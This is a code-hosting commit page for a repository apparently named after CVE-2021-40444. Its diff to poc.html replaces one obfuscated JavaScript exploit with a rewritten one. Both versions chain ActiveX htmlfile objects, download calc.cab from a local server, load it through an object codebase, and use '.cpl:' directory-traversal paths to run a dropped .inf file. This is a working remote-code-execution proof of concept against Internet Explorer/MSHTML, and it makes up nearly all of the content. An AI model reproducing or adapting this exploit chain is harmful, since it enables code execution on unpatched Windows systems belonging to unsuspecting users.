crash.software
Projects
Pull Requests
Issues
Builds
CVE-2021-40444-Sample
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2021-40444-Sample Commits a4ae5dc8
🤬
  • ■ ■ ■ ■ ■ ■
    poc.html
    skipped 4 lines
    5 5   <meta http-equiv="X-UA-Compatible" content="IE=11">
    6 6   </head>
    7 7   <body>
    8  - <script>
    9  -function(){
    10  - try{
    11  - window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
    12  - window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
    13  - }catch(_0x1c747c){
    14  - window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
    15  - window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
    16  - }
    17  - iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
    18  - window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
    19  - try{
    20  - window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
    21  - window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
    22  - }catch(_0x5afb73){
    23  - window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
    24  - window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
    25  - }
    26  - iframeActxHtml1['open']()['close']();
    27  - var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');
    28  - iframeActxHtml2['open']()['close']();
    29  - iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');
    30  - iframeActxHtml3['open']()['close']();
    31  - var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');
    32  - iframeActxHtml4['open']()['close']();
    33  - var actx_html_0=new ActiveXObject('htmlfile'),
    34  - actx_html_1=new ActiveXObject('htmlfile'),
    35  - actx_html_2=new ActiveXObject('htmlfile'),
    36  - actx_html_3=new ActiveXObject('htmlfile'),
    37  - actx_html_4=new ActiveXObject('htmlfile'),
    38  - actx_html_5=new ActiveXObject('htmlfile'),
    39  - xmlhttpreq1=new window['XMLHttpRequest'](),
    40  - window['setTimeout']=window['setTimeout'];
    41  - window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/calc.cab',![]),
    42  - window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
    43  - iframeActxHtml4['Script']['document']['write']('&amp;lt;body>');
    44  - var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
    45  - cabloadunpack['setAttribute']('codebase','http://localhost/calc.cab#version=5,0,0,0');
    46  - cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
    47  - window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
    48  - actx_html_0['Script']['location']='.cpl:123',
    49  - actx_html_0['Script']['location']='.cpl:123',
    50  - actx_html_0['Script']['location']='.cpl:123',
    51  - actx_html_0['Script']['location']='.cpl:123',
    52  - actx_html_0['Script']['location']='.cpl:123',
    53  - actx_html_0['Script']['location']='.cpl:123',
    54  - actx_html_0['Script']['location']='.cpl:123',
    55  - actx_html_0['Script']['location']='.cpl:123',
    56  - actx_html_0['Script']['location']='.cpl:123',
    57  - actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/calc.inf',
    58  - actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/calc.inf',
    59  - actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/calc.inf',
    60  - actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/calc.inf',
    61  - actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/calc.inf',
    62  - actx_html_3['Script']['location']='.cpl:../../../../../Temp/calc.inf',
    63  - actx_html_3['Script']['location']='.cpl:../../Low/calc.inf',
    64  - actx_html_3['Script']['location']='.cpl:../../calc.inf';
    65  -}();
    66  - </script>
     8 +<script>
     9 +function exploit() {
     10 + var x = window["document"];
     11 + var then = window["Document"]["prototype"]["createElement"];
     12 + var _0x4d7c02 = window["Document"]["prototype"]["write"];
     13 + var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
     14 + var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
     15 + var range = then["call"](x, "iframe");
     16 + try {
     17 + PL$22["call"](x["body"], range);
     18 + } catch (errx) {
     19 + PL$22["call"](x["documentElement"], range);
     20 + }
     21 + var ACTIVEX = range["contentWindow"]["ActiveXObject"];
     22 + var view = new ACTIVEX("htmlfile");
     23 + range["contentDocument"]["open"]()["close"]();
     24 +
     25 + try {
     26 + opfilter["call"](x["body"], range);
     27 + } catch (err) {
     28 + opfilter["call"](x["documentElement"], range);
     29 + }
     30 + view["open"]()["close"]();
     31 + var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
     32 + mappedObj["open"]()["close"]();
     33 + var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
     34 + TokenType["open"]()["close"]();
     35 + var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
     36 + model["open"]()["close"]();
     37 + var iedom = new ActiveXObject("htmlfile");
     38 + var rp_test = new ActiveXObject("htmlfile");
     39 + var wmp_test = new ActiveXObject("htmlfile");
     40 + var doc = new ActiveXObject("htmlfile");
     41 + var a = new ActiveXObject("htmlfile");
     42 + var fake = new ActiveXObject("htmlfile");
     43 + var errors = window["XMLHttpRequest"];
     44 + var $node = new errors;
     45 + var directiveProcessors = errors["prototype"]["open"];
     46 + var nodeTypeRender = errors["prototype"]["send"];
     47 + var newAttributes = window["setTimeout"];
     48 + directiveProcessors["call"]($node, "GET", "http://127.0.0.1/calc.cab", ![]);
     49 + nodeTypeRender["call"]($node);
     50 + model["Script"]["document"]["write"]("<body>");
     51 + var PL$41 = then["call"](model["Script"]["document"], "object");
     52 + PL$41["setAttribute"]("codebase", "http://127.0.0.1/calc.cab#version=5,0,0,0");
     53 + PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
     54 + PL$22["call"](model["Script"]["document"]["body"], PL$41);
     55 + iedom["Script"]["location"] = ".cpl:123";
     56 + iedom["Script"]["location"] = ".cpl:123";
     57 + iedom["Script"]["location"] = ".cpl:123";
     58 + iedom["Script"]["location"] = ".cpl:123";
     59 + iedom["Script"]["location"] = ".cpl:123";
     60 + iedom["Script"]["location"] = ".cpl:123";
     61 + iedom["Script"]["location"] = ".cpl:123";
     62 + iedom["Script"]["location"] = ".cpl:123";
     63 + iedom["Script"]["location"] = ".cpl:123";
     64 + iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/calc.inf";
     65 + rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/calc.inf";
     66 + wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/calc.inf";
     67 + doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/calc.inf";
     68 + a["Script"]["location"] = ".cpl:../../../../../Temp/Low/calc.inf";
     69 + doc["Script"]["location"] = ".cpl:../../../../../Temp/calc.inf";
     70 + doc["Script"]["location"] = ".cpl:../../Low/calc.inf";
     71 + doc["Script"]["location"] = ".cpl:../../calc.inf";
     72 +}
     73 +exploit();
     74 +</script>
    67 75   </body>
    68 76  </html>
    69 77   
Please wait...
Page is in error, reload to recover